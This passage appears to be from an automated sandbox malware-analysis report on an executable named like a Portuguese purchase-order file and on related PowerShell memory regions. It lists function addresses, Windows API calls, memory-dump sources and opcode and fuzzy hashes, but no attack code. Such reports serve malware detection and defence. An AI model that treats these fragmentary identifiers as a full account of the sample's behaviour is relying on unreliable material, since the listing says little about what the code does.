                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$GlobalLibrary
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 1100898210-3081826266
                                                                                              • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                              • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                              • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                              • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405A56
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405A66
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-224404859
                                                                                              • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                              • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                              • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                              • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B8A Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                              • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                              • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                              • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              Function 04F4EFF8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \V#k
                                                                                              • API String ID: 0-2892493493
                                                                                              • Opcode ID: 255001c8551852d849b1f30045f0e09ff3fd6f11943c3a8ccaa406a20d9f57e4
                                                                                              • Instruction ID: 393261f884989d19e1fb82c278b2908568e352551a8def8086a73cd9dd0bc94b
                                                                                              • Opcode Fuzzy Hash: 255001c8551852d849b1f30045f0e09ff3fd6f11943c3a8ccaa406a20d9f57e4
                                                                                              • Instruction Fuzzy Hash: 79B13B71E00209DFDB10CFA9D9857ADBFF2AFC8314F148529D819A7254EF74A846CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04F4F8C8 Relevance: .3, Instructions: 266COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 219d60bc02fffe2078941d325b7ac34b3671f48b3636b559ef5fb9317a621aa3
                                                                                              • Instruction ID: 47aea3c0143d72bdb0bb92ec6eabe543a25592659dd06d59cb276c2695f30988
                                                                                              • Opcode Fuzzy Hash: 219d60bc02fffe2078941d325b7ac34b3671f48b3636b559ef5fb9317a621aa3
                                                                                              • Instruction Fuzzy Hash: 9CB17F71E00209DFDB10CFA9C89179DBFF2AF88314F148529D859E7294EF74A886CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B04180 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                              • API String ID: 0-1420252700
                                                                                              • Opcode ID: 03e0b6c77a0d86e4b3d0ec73c18e1107bc50ebbb25b8ca7a8e863a6cb395fd97
                                                                                              • Instruction ID: c09324172724c75434f1272d076877101f383393256cfcc8d945684965a03733
                                                                                              • Opcode Fuzzy Hash: 03e0b6c77a0d86e4b3d0ec73c18e1107bc50ebbb25b8ca7a8e863a6cb395fd97
                                                                                              • Instruction Fuzzy Hash: EBE181B0B402099FE714DB68C940B5EBBB2EF95304F14C4A9DA05AF395CB75EC49CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B01518 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q$$^q
                                                                                              • API String ID: 0-831282457
                                                                                              • Opcode ID: 7b3a580e12c668cfb45e832b9d9937a8d772dd9436913a2b6ba410a31f9efea0
                                                                                              • Instruction ID: 4082c9a2746b45b15bff4eb8d5b585bf39e6ff917dea19d6b03df7d9f714261b
                                                                                              • Opcode Fuzzy Hash: 7b3a580e12c668cfb45e832b9d9937a8d772dd9436913a2b6ba410a31f9efea0
                                                                                              • Instruction Fuzzy Hash: 182127F170030E5BEB3C596E9800B2BAEDAABC0711F24886AA50ACF3C5DD35D84583E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B03682 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 5ef0bbffd1909671d0dfaec0461df7f7d172df50e02eeaf2125ca5bac387a729
                                                                                              • Instruction ID: cd88e211c49d593a65d5533a6876508b9f309dbe9405e5f1d7bbeae8c2125999
                                                                                              • Opcode Fuzzy Hash: 5ef0bbffd1909671d0dfaec0461df7f7d172df50e02eeaf2125ca5bac387a729
                                                                                              • Instruction Fuzzy Hash: B92271B0B002189FDB14DB68C955F6ABFB2EB84304F1085A9E9059F3A6CB72DC45CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0B87B Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 7893088b757477c77b49ef7994517aa340b5ff6e686145fd7c97e34614a9cf13
                                                                                              • Instruction ID: 5ccaec739556bd637780aa0258892f851a948a29a8aba777cf6e7ea8d75a20d4
                                                                                              • Opcode Fuzzy Hash: 7893088b757477c77b49ef7994517aa340b5ff6e686145fd7c97e34614a9cf13
                                                                                              • Instruction Fuzzy Hash: 001260B0700218DFDB24DB58CD55B9ABBB2EB85304F108499D909AF396CB72ED85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B04173 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q
                                                                                              • API String ID: 0-2697143702
                                                                                              • Opcode ID: 82172d59645060a566ab396eee9ba3ba046c7d14a8dac9e24f852e4209ee0b72
                                                                                              • Instruction ID: 530172acfe5978d268b4a3f687e55b4efe4ac27883c4c28470eec9f2f632dacf
                                                                                              • Opcode Fuzzy Hash: 82172d59645060a566ab396eee9ba3ba046c7d14a8dac9e24f852e4209ee0b72
                                                                                              • Instruction Fuzzy Hash: D0C18EB4B002499FEB14DB58C940B9EBBB2EF99304F14C499DA056F3A5CB71E849CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B01511 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q
                                                                                              • API String ID: 0-355816377
                                                                                              • Opcode ID: 5eb83aebae78ac391f3bc418fd7a6b1d49c11a28ad5bcf536f242e869389cadb
                                                                                              • Instruction ID: 278d69da7759f8e4eb5afe6e514e6a3b9cb4ad8e442317a098282db53d2ace1b
                                                                                              • Opcode Fuzzy Hash: 5eb83aebae78ac391f3bc418fd7a6b1d49c11a28ad5bcf536f242e869389cadb
                                                                                              • Instruction Fuzzy Hash: 4C117AF570430E27FB38082E8801BAB7EDA9BD0710F148469B906CF3C5D935D48882F5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B00C86 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q
                                                                                              • API String ID: 0-355816377
                                                                                              • Opcode ID: 282bee52e7bf8bde0ccefe4da7866d582fc08f46fbc16e2964e929b15675c01f
                                                                                              • Instruction ID: 27f318382960bfdc3b944076532c6a4377ad32ba26c398af2d73e978bc7cd44e
                                                                                              • Opcode Fuzzy Hash: 282bee52e7bf8bde0ccefe4da7866d582fc08f46fbc16e2964e929b15675c01f
                                                                                              • Instruction Fuzzy Hash: 23012BF1B442098FE7289B588850A2BB7E3FFD4614B24896ED405CF394CE32CC169792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B03DF4 Relevance: 1.8, Strings: 1, Instructions: 590COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: 2c86da8f78157dbcaf03a28e2e7217cfd71e28f23887982900ebe3123f77734a
                                                                                              • Instruction ID: b9b2a347103db3450de5467ab779c28e7eb46725d571cce9e9fc944124716f0f
                                                                                              • Opcode Fuzzy Hash: 2c86da8f78157dbcaf03a28e2e7217cfd71e28f23887982900ebe3123f77734a
                                                                                              • Instruction Fuzzy Hash: E2324EB4B002199FDB20DB58C945F6ABBB2FB84304F14C5A9E9099F396CB72DC45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0BF66 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: abbcbaa69ff82b128287e58ca658cf659eadf01921dca349868a5ac2355c3746
                                                                                              • Instruction ID: 5d734e90a5132844146cda69826bd40fbc3a7000fc85143cd271d262a80136d9
                                                                                              • Opcode Fuzzy Hash: abbcbaa69ff82b128287e58ca658cf659eadf01921dca349868a5ac2355c3746
                                                                                              • Instruction Fuzzy Hash: 3F3260B0700218DFDB20DB58CD55F9ABBA2EB88304F108499D9099F396CB72ED85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B03EFD Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: 3c9940da01e7de8af54c1f1a10d9bb23b9c88fde14cc2addb0fb740148c86f0a
                                                                                              • Instruction ID: 264f4c342eaeffbf95a1cb2b7e822c30553f14bcf26f5ba690e9410a1341ad70
                                                                                              • Opcode Fuzzy Hash: 3c9940da01e7de8af54c1f1a10d9bb23b9c88fde14cc2addb0fb740148c86f0a
                                                                                              • Instruction Fuzzy Hash: 710250B4B002199FDB10DB58C945F6ABBB2FB84304F108599E905AF3A6CB76EC45CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0C04C Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q
                                                                                              • API String ID: 0-1614139903
                                                                                              • Opcode ID: 951eed7bb14f53e5ceb47fbce7251ed6e0353a14c8bc83984fea652da7c852ee
                                                                                              • Instruction ID: db55b213f1243dacb7e178d2c9ddbc91cd57ee90f6bb72de697acef4e359cd14
                                                                                              • Opcode Fuzzy Hash: 951eed7bb14f53e5ceb47fbce7251ed6e0353a14c8bc83984fea652da7c852ee
                                                                                              • Instruction Fuzzy Hash: 550260B0700218DFDB24DB58CD95B9ABBB2EB84304F108499D909AF395CB72ED85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B04A98 Relevance: .7, Instructions: 680COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d11a2b0af69dadb797833241922c40169ac7693371c9119144e66cf39c44599
                                                                                              • Instruction ID: 64875757332f8101dc6d2c4e28d5ac1fa418c917195f94147330a9b7e99f541d
                                                                                              • Opcode Fuzzy Hash: 1d11a2b0af69dadb797833241922c40169ac7693371c9119144e66cf39c44599
                                                                                              • Instruction Fuzzy Hash: 25526AB4B01209DFE714CB98C944E6EBBB2EF85304F1181A9E9059F795CB72EC85CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B04A7C Relevance: .6, Instructions: 551COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8fadc0da93871ed56ed95241dac27be901212d1a1f758c839c3fbcfcafe662e5
                                                                                              • Instruction ID: 241cae25872631b1af63618b0fdad1bf27d161a732467e40efaf89d5fc0b6a4c
                                                                                              • Opcode Fuzzy Hash: 8fadc0da93871ed56ed95241dac27be901212d1a1f758c839c3fbcfcafe662e5
                                                                                              • Instruction Fuzzy Hash: 5A326BB4A01209DFE714CB98C840E5DBBB2EF85314F1581A9E9059F796CB72EC46CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B05114 Relevance: .5, Instructions: 465COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1555cfa4bf56ad5d8ee84036ba957c5554c602e1e760ef85bad6b2ed45a6ba6a
                                                                                              • Instruction ID: cb57eae24e5b4e99f4669f57010e2952967f20b7852aa4f9e416262bba9d9472
                                                                                              • Opcode Fuzzy Hash: 1555cfa4bf56ad5d8ee84036ba957c5554c602e1e760ef85bad6b2ed45a6ba6a
                                                                                              • Instruction Fuzzy Hash: 7D1269B4A01209EFE724CB98C940E6DBBB2EF95304F14C1A9E9159B795CB72EC45CF81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0C4B2 Relevance: .3, Instructions: 320COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1ef59d6ff87a73d8ea2a1f58c1ec0fa131a129fb46e56caff1e887d6b5a0349
                                                                                              • Instruction ID: 5b510c74cd5985828668ed5c6c5c21bbf629b397b0cd975d4ea0fe8c7e5a97c2
                                                                                              • Opcode Fuzzy Hash: f1ef59d6ff87a73d8ea2a1f58c1ec0fa131a129fb46e56caff1e887d6b5a0349
                                                                                              • Instruction Fuzzy Hash: BEE15FB4A00219CFEB20DB58C945BAABBB2FB85304F1085D9D909AF395CB71DD85CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04F47320 Relevance: .3, Instructions: 266COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e38e538d9dc61bc87226314339807b6128370fa1d40522c0c85f8d77ca5e82d
                                                                                              • Instruction ID: f10ea0b3e5bcc814cfd69e3f4511b746957db38f480a1104a940e7f0cde01bfa
                                                                                              • Opcode Fuzzy Hash: 6e38e538d9dc61bc87226314339807b6128370fa1d40522c0c85f8d77ca5e82d
                                                                                              • Instruction Fuzzy Hash: E8A13D35A002089FDB14EFA5D984AADBBF2FF84314F114559E806AF364DB74BD4ACB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04F4AED0 Relevance: .3, Instructions: 262COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00f2c8b1ab5e584eed7ecb6b0f53f7c4a152d3b7cb0a9cdcd49c7a3522857ca3
                                                                                              • Instruction ID: 8bf69da5f69c58ebbfb9dfcb392d3a5e4c56de05c60b59b2d3036ec1decaf7ba
                                                                                              • Opcode Fuzzy Hash: 00f2c8b1ab5e584eed7ecb6b0f53f7c4a152d3b7cb0a9cdcd49c7a3522857ca3
                                                                                              • Instruction Fuzzy Hash: 0FB10875E012089FDB15CFA8D484A9DBFB2FF88314F248159E805AB365DB71ED86CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B058B8 Relevance: .2, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ee192f24ec0b96c53ac90bde4abd1d5227ce076806f36e2f4b47f808eb146c94
                                                                                              • Instruction ID: f5278a3d64c052f8f588ce254d081f99c62d7d7186d5c9ae3c09ce1d8dfe9833
                                                                                              • Opcode Fuzzy Hash: ee192f24ec0b96c53ac90bde4abd1d5227ce076806f36e2f4b47f808eb146c94
                                                                                              • Instruction Fuzzy Hash: 5391AFB1B00205DFEB24DB58C440E9ABBB2EF88314F1484A9D905AB791CB32ED45CFE1
                                                                                              Uniqueness

